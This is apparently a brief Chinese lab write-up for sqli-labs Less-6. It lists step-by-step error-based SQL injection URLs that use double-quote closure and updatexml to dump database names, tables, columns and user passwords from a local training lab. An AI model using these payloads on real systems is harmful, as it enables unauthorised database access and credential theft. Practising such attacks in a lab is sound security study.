sqli-labs less 6
阿新 • • 發佈:2021-01-02
一、輸入id,回顯正常
127.0.0.1/sqli-labs-master/Less-6/?id=1
二、新增雙引號,頁面報錯後,添加註釋符,頁面正常,則為雙引號閉合
http://127.0.0.1/sqli-labs-master/Less-6/?id=1"
http://127.0.0.1/sqli-labs-master/Less-6/?id=1"--+
###以下除閉合方式外與第五關相同
三、爆當前資料庫
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and updatexml(1,(concat( '^',database())),1)--+
四、爆所有資料庫(更改limit逐個顯示)
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and updatexml(1,(concat('^',(select schema_name from information_schema.schemata limit 0,1))),1)--+
五、爆指定資料庫所有表(更改limit逐個顯示)
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and updatexml(1,(concat('^',(select table_name from information_schema.tables where table_schema='security' limit 0,1))),1)--+
六、爆指定表的所有列(更改limit逐個顯示)
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and updatexml(1,(concat('^',(select column_name from information_schema.columns where table_name='users' limit 1,1))),1)--+
七、爆指定列所有值(更改imit逐個顯示)
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and updatexml(1,(concat('^',(select password from users limit 1,1))),1)--+
over~